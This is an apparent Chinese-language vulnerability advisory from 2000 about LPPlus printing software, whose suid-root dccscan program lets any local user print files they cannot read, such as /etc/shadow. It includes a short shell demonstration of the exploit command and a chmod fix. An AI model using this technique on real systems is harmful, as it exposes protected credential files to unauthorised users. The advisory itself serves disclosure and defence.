LPPlus dccscan 打印敏感文件漏洞
发布日期:2000-09-07
更新日期:2000-09-07
受影响系统:
Plus Technologies LPPlus 3.3.0 for Solaris 2.x
Plus Technologies LPPlus 3.2.1 for Linux
描述:
LPPlus 是Plus Technologies出品的一个Unix下的打印管理系统。它存在一些安全问题
$LPHOME/bin/dccscan被设置了suid root属性并且可以被任何用户执行。可能让任何未
授权用户打印他本来无权阅读的文件。即使在LPPlus的安全配置中没给该用户任何访问
权限(比如访问打印机或者LPPlus设备的权限),他仍然可以打印那些敏感文件,例如
/etc/shadow。
<*来源: Dixie Flatline (
echo8@FIREST0RM.ORG) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
# id
uid=0(root) gid=1(other)
# ls -alt /root/test
total 6
drwx------ 2 root other 512 Sep 5 17:46 .
-r-------- 1 root other 365 Sep 5 17:46 foo
drwx------ 3 root other 512 Sep 5 17:46 ..
# su - test
Sun Microsystems Inc. SunOS 5.6 Generic August 1997
$ id
uid=600(test) gid=300(users)
$ ls -alt /root/test/foo
/root/test/foo: Permission denied
$ dccscan /root/test 30 5 "-dlp0"
$
现在你就可以到打印机上等待文件被打印出来了
建议:
临时解决办法:
NSFOCUS建议您去除该程序的suid root位:
chmod u-s $LPHOME/bin/dccscan
厂商补丁:
暂无
浏览次数:5774
严重程度:0(网友投票)